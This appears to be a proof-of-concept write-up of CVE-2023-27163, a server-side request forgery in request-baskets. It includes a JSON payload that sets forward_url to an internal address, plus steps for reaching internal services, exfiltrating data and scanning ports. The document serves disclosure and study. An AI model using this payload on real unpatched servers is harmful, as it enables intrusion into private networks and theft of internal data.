🧺CVE-2023-27163

Request-basket SSRF

About the application

Request Baskets is a web service to collect arbitrary HTTP requests and inspect them via RESTful API or simple web UI.

It is strongly inspired by ideas and application design of the RequestHub project and reproduces functionality offered by RequestBin service.

CVE Description

CVE-2023-27163 - request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.

Unveiling Web Application Dynamics

First i download and run the vulnerable version

the main page of request baskets

The following API’s are vulnerable to SSRF：

• /api/baskets/{name}

• /baskets/{name}

After creating a basket, navigate to your basket administration page.

new created basket

By clicking on 'Settings,' a new configuration menu will pop up, allowing for further modifications.

"Forward URL" is the vulnerable option here, which can potentially lead to (SSRF).

payload POST request to /api/baskets/{name} example:

{
  "forward_url": "http://127.0.0.1:80/new",
  "proxy_response": false,
  "insecure_tls": false,
  "expand_path": false,
  "capacity": 200
}

proxy_response: When configuring a forward URL, there is an additional setting that enables the request to be processed and returns the response to the client. It is crucial for your exploit to set this option to 'true' in order to successfully complete the process.

Exploit POC

As an illustrative example, let's consider the scenario of accessing an internal web admin control panel on port 80.

forward URL to the desired destination

then you visit your basket url "http://127.0.0.1:55555/new"

Things you can also do

Information Disclosure and Exfiltration

One critical issue that has been identified is information disclosure and exfiltration. Initially, it was discovered that unauthenticated requests for images could lead to the leakage of all images stored on the server. However, it's important to note that this vulnerability extends beyond just images. Any resource accessible through an HTTP request on the local network of the webserver can be remotely obtained using this method.

Unauthenticated Access to Internal Network HTTP Servers

The SSRF attack can be exploited to gain unauthenticated access to any HTTP Server connected to the same network as the request-baskets server. For instance, it allows connecting to internal resources like an Nginx server that is only exposed internally, an internal RESTful API (such as a NoSQL or GraphQL database), or any other service. It's worth mentioning that this vulnerability is not limited to services hosted on the local machine but extends to all machines connected within the local network.

Port and IP Scanning and Enumeration

Additionally, this vulnerability provides an opportunity for port scanning and enumeration. With SSRF, it becomes possible to perform on-demand port scanning for both internal and external HTTP servers. Furthermore, it enables the enumeration of all machines within the local network that have open HTTP ports. This capability enhances the attacker's ability to identify and target potential entry points in the network.

Please note that these vulnerabilities pose serious security risks and must be addressed promptly to safeguard the network and its resources.

Resources

• https://gist.github.com/b33t1e/3079c10c88cad379fb166c389ce3b7b3

• https://notes.sjtu.edu.cn/s/MUUhEymt7